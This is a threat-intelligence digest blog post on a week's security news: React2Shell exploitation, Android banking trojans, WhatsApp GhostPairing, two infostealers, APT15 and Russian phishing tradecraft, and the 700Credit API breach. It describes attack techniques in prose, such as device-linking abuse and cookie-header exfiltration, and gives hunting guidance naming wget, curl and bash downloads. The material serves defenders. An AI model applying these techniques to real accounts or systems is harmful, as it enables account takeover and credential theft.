EvilBit Threat Digest - Multiple Actors, Multiple Platforms, Multiple Headaches

KryptoKat here. It's been one of those weeks where the incident queue starts to blur together--React exploitation updates, a wave of Android banking trojans, credential stealers with holiday-themed branding, and a breach affecting millions of car buyers. The connective tissue? Attackers are diversifying their approach, hitting every platform they can reach and every trust relationship they can abuse. From WhatsApp's device-linking feature to credit check APIs, the week's stories share a common theme: legitimacy is the best disguise.

Let's sort through what actually demands your attention.

React2Shell: The Clustering Continues

We've been tracking CVE-2025-55182 since early December, and the exploitation landscape keeps expanding. Google Threat Intelligence Group's latest analysis confirms at least five distinct threat clusters are now actively exploiting the React Server Components vulnerability, each deploying different malware families.

The identified payloads include MINOCAT (a tunneling tool), SNOWLIGHT (a downloader), HISONIC and COMPOOD (backdoors), and the usual XMRig cryptominers. What's notable this time is the sophistication of the persistence mechanisms: attackers are deploying hidden cron jobs, systemd services disguised as system updates, and modifications to shell configuration files to maintain access even after the initial webserver compromise is cleaned up.

For defenders still working through remediation, the updated hunting guidance is critical. Look for processes spawned by your Node.js runtime executing wget, curl, or bash, especially to download binaries from suspicious infrastructure. Google published YARA rules targeting the specific malware families, and the IOC list includes domains like those documented in their December 12 advisory.

If you're still not patched--and I know some of you are waiting on vendor support for older Next.js versions--deploy the Cloud Armor WAF rules as a virtual patch and get those React Server Component packages updated to 19.0.1+, 19.1.2+, or 19.2.1+ immediately. This isn't slowing down.

Mobile Malware Season: Android Banking Trojans and WhatsApp Abuse

The mobile threat landscape delivered three distinct stories this week, each demonstrating a different angle on credential theft and device compromise.

Frogblight: Turkish Phishing via Fake Government Portals

Kaspersky's analysis of Frogblight describes a newly observed Android banking trojan targeting Turkish users through smishing campaigns that impersonate government court notifications. The initial lure directs victims to fake e-Challan or mParivahan-themed phishing pages, convincing them to sideload a malicious APK.

Once installed, Frogblight uses JavaScript injection into WebViews to intercept banking credentials as users log into their financial apps. It also harvests SMS messages, contact lists, files, and can send arbitrary SMS--classic banking trojan capabilities, but wrapped in a convincing government services lure. The malware supports both REST and WebSocket-based C2, and Kaspersky's report notes that the control panel is actively maintained with ongoing development. The IOCs include APK hashes, distribution URLs, and C2 domains that defenders can blocklist immediately.

NexusRoute: Impersonating India's Road Transport Ministry

CYFIRMA documented NexusRoute, a financially motivated Android RAT campaign impersonating India's Ministry of Road Transport and Highways. The attackers created GitHub-hosted clones of the legitimate mParivahan and e-Challan services, complete with convincing phishing pages that collect UPI PINs, banking credentials, and SMS/OTP interception.

The malicious APKs grant themselves extensive permissions--SMS read/send, contacts, call logs, camera, location, and accessibility services. Once deployed, the RAT conducts continuous surveillance and exfiltrates data to attacker-controlled servers. The campaign's infrastructure abuse is notable: using GitHub Pages for hosting and cloning legitimate government branding to build trust.

For defenders in the region, CYFIRMA provides concrete IOCs including APK hashes, GitHub repository URLs, and phishing domains. The immediate mitigation is user education: do not sideload apps from links received via SMS, and verify government service downloads through official app stores only.

GhostPairing: Full WhatsApp Takeover via Device Linking

This one's particularly clever. Gen Digital's Threat Labs and independent reporting documented a social engineering technique called GhostPairing that abuses WhatsApp's legitimate device-linking feature to grant attackers persistent access to a victim's account--no SIM swap or password theft required.

The attack works like this: victims receive a message about a supposed photo or video. Clicking the link takes them to a fake photo viewer page that prompts them to complete a "verification" step. This step is actually WhatsApp's legitimate device-pairing flow, which the victim unknowingly completes by scanning a QR code or entering a pairing code. The attacker's browser is now added as a linked device with full read and write access to the victim's WhatsApp.

From that point, the attacker can view all messages (historical and incoming), access media, and send messages as the victim. The session persists until the victim manually removes the linked device from Settings → Linked Devices--something most users never check.

The defense is procedural and educational: regularly audit your linked devices in WhatsApp settings, enable two-step verification (PIN), and treat any unsolicited request to scan a QR code or enter a pairing code as highly suspicious. Only initiate device linking from within the official WhatsApp app itself, never from a web page.

For SOC teams managing BYOD or corporate mobile fleets, this is a useful awareness campaign topic: demonstrate the attack, show users what linked devices look like in settings, and encourage regular audits.

The Infostealer Buffet: SantaStealer and Luca Stealer

Two new credential stealers surfaced this week, both worth tracking for their technical details and distribution models.

SantaStealer: Festive Branding, Fileless Execution

Rapid7's analysis of SantaStealer (a rebrand of the earlier BluelineStealer) shows a modular infostealer-as-a-service targeting Chromium-based browsers, Telegram, Discord, Steam, and cryptocurrency wallets. The malware is notable for its use of fileless techniques and reflective injection to load modules in memory without touching disk.

Early leaked builds--likely shared by disgruntled affiliates or researchers--contain plaintext configuration files and hard-coded C2 addresses, often communicating over TCP port 6767. The malware uses a distinctive upload pattern: HTTP POST requests with User-Agent: upload and multipart form data containing authentication headers. This makes detection straightforward in the short term, though operators should expect obfuscation and encryption to improve as the service matures.

Rapid7 published SHA-256 hashes for known samples and network indicators for C2 infrastructure. For defenders, the immediate actions are to ingest those hashes into EDR/AV, create IDS signatures for the upload pattern, and hunt for reflective injection and process hollowing behaviors (look for CreateRemoteThread and WriteProcessMemory API calls targeting browsers or other credential-rich processes).

Secondary coverage from The Register, BleepingComputer, and SC Magazine corroborates the findings and notes that the stealer specifically targets Chrome's AppBound Encryption feature, demonstrating that attackers are keeping pace with browser security improvements.

Luca Stealer: Rust Goes Cross-Platform

Multiple outlets reported on Luca Stealer, a Rust-based information stealer with confirmed builds for both Linux and Windows. The malware's open-source availability (it's been circulated in underground forums) increases the risk of rapid variant proliferation and copycat campaigns.

UncleSp1d3r (interjecting): Rust binaries can be challenging to reverse engineer primarily due to aggressive LLVM optimizations, extensive inlining, and monomorphization of generics, which obscure high-level structure. Every generic instantiation becomes a concrete copy. You don’t get one clean function; you get N nearly-identical ones with subtle differences. Hope you like scrolling. Strings are often obfuscated or dynamically constructed, and the binary structures don't match the patterns that traditional static analysis tools expect (as a red teamer and a proud Rustacean, I'll take my non-idiomatic symbol patterns, but I acknowledge the plight of RE). For threat hunters, look for strings like cargoregistry and std::rt::lang_start_internal as indicators of Rust-built malware, and lean on dynamic analysis (sandboxing, network/file I/O instrumentation) to capture C2 behavior. Be careful of just searching for telltale signs of Rust code though, since this will result in false-positives as Rust code is way more common than you might think.

The report from UZCERT (Uzbekistan's national CSIRT) provides a confirmed SHA256 hash for one sample, which defenders can add to blocklists immediately. Cross-platform stealers are particularly dangerous in heterogeneous environments where a single phishing campaign can compromise both developer workstations (Linux) and end-user systems (Windows).

APT Espionage: Targeting Tactics and Regional Phishing

Two APT-related stories this week provide useful intelligence for defenders tracking state-sponsored activity.

APT15: Seven Years of Diplomatic Espionage

Picus Security's technical profile of APT15 (also known as Vixen Panda, Ke3chang, and Royal APT) consolidates the group's TTPs from campaigns spanning 2018 to 2025. The research, corroborated by an AlienVault OTX pulse with identical IOCs, maps the group's tradecraft to MITRE ATT&CK and links several CISA KEV-listed CVEs to their operations.

APT15's access vectors combine spearphishing attachments with exploitation of public-facing applications. Once inside, they deploy webshells, use valid accounts for persistence, and establish command-and-control over HTTP with data obfuscated via Base64 and URL-safe encoding variants. The group's exfiltration tradecraft is particularly stealthy: embedding stolen data in HTTP Cookie and Set-Cookie headers, and using steganography to hide payloads within image files.

For defenders, the immediate value is in the hunting guidance. Look for:

• Persistence via Active Setup registry entries and hidden scheduled tasks
• .lnk files in Startup folders
• HTTP traffic with large or Base64-encoded Cookie headers
• Image requests with unusually large file sizes or anomalous encoding patterns
• Decryption routines using TEA or RC4-like ciphers

Picus ties specific CVEs (including those affecting Microsoft WSUS, Oracle E-Business Suite, and Fortinet FortiWeb) to APT15 campaigns, providing a direct link between patching priorities and threat actor behavior.

Russian Phishing Targets Baltics and Balkans

StrikeReady Labs documented a Russian APT credential phishing campaign targeting governments in the Baltic and Balkan regions (Lithuania, Bulgaria, Bosnia and Herzegovina, North Macedonia, Moldova, Montenegro, and Ukraine). The campaign, active since at least 2023, uses HTML decoy files to steal credentials and exfiltrate them via formcarry.com--a legitimate form-processing service.

The technique is straightforward but effective: victims receive spearphishing emails with HTML attachments disguised as official documents. Opening the file presents a fake login form that submits credentials to the attacker's formcarry.com endpoint. The use of a legitimate service makes blocking more complex and allows the campaign to evade basic email security controls.

StrikeReady provides MD5 hashes for the malicious HTML files in their GitHub repository. Our usual recommendations to deploy robust email security and educate users on the dangers of opening unsolicited attachments - especially those with misleading file names - apply here.

Breach Blotter: 700Credit Exposes Millions via Third-Party API

The week's major data breach story comes from the automotive financing sector. 700Credit confirmed a breach impacting approximately 5.6 to 5.8 million vehicle dealership customers. According to filed breach notifications and coverage from TechCrunch, an attacker exploited an exposed or misconfigured API endpoint tied to a compromised third-party integration.

The exposed data includes names, addresses, dates of birth, and Social Security numbers--the full identity theft starter pack. The breach occurred between roughly May and October 2025, with the attacker copying customer records from the 700Dealer.com platform by abusing API access that should have been restricted.

700Credit has disabled the vulnerable API, is notifying affected individuals and filing regulatory notices on behalf of impacted dealerships, and is offering 12 months of TransUnion credit monitoring. The company attributes the incident to a third-party partner compromise that cascaded into their own environment.

For defenders, this is a textbook lesson in API security failures:

• Validate requester identity and consumer reference IDs server-side (don't trust client-provided identifiers)
• Apply least privilege to third-party integrations with short-lived tokens and mutual TLS
• Rate-limit API calls and alert on anomalous bulk reads
• Conduct regular third-party security reviews and mandate breach notification in contracts

The BleepingComputer coverage notes minor variance in reported victim counts across sources, but the order of magnitude is clear: this is a large-scale exposure with significant downstream identity fraud risk.

Tooling Update: Kali Linux 2025.4

For those of us who live in the offensive security toolkit, Kali Linux 2025.4 shipped this week with updates that improve usability and expand capabilities for penetration testers and security researchers.

The major changes include:

• Desktop environment refreshes: GNOME 49, KDE Plasma 6.5, and Xfce updates
• Wayland becomes the default window server (with full VM guest support and fallback to X11 where needed)
• Kernel bump to 6.16 for improved hardware support
• Three new offensive/security tools: bpf-linker (for eBPF development), evil-winrm-py (Python implementation of the popular WinRM post-exploitation tool), and hexstrike-ai (an AI-assisted exploitation framework)

The Wayland transition is particularly relevant for operators running Kali in VirtualBox, VMware, or other virtualized environments--previous versions had inconsistent support, but 2025.4 makes it the smooth default experience.

For teams maintaining standardized pentesting images, this is your cue to update base builds and re-test tool compatibility. The official release notes include upgrade instructions and a full changelog.

Closing Thoughts

This week was a study in diversification--attackers targeting every layer of the stack, from web frameworks to mobile platforms to third-party integrations. React2Shell evolved from a single critical RCE into a multi-cluster exploitation event with distinct malware families. Mobile banking trojans are getting more sophisticated, with geographic targeting, WebView injection, and self-propagation mechanics. And the 700Credit breach is a painful reminder that your security perimeter extends to every third-party API you expose.

The defensive playbook is consistent: patch known vulnerabilities immediately, audit third-party access controls, educate users on social engineering tactics, and hunt for the specific IOCs published by researchers. The fundamentals work, but only if you actually implement them before the breach notification goes out.

And maybe--just maybe--audit your WhatsApp linked devices while you're at it. You'd be surprised what's connected.

Keep your detection sharp and your mitigations layered. The threat actors aren't slowing down, and neither can we.

-- KryptoKat

Recent Nessus Plugin Updates

For vulnerability management teams tracking scanner coverage, Tenable released updated Nessus plugins this week for:

• QNAP QTS and QuTS hero vulnerabilities
• Adobe ColdFusion updates (APSB25-105)
• Microsoft Azure Monitor Agent vulnerabilities
• Red Hat Enterprise Linux updates (Grafana, luksmeta)
• Rocky Linux updates (kernel, tomcat, wireshark)
• SUSE Linux Enterprise updates (postgresql16, python, kubernetes-client)
• Mozilla Firefox and Thunderbird (MFSA 2025-92)
• Apache Tomcat vulnerabilities
• PostgreSQL vulnerability (CVE-2025-12817)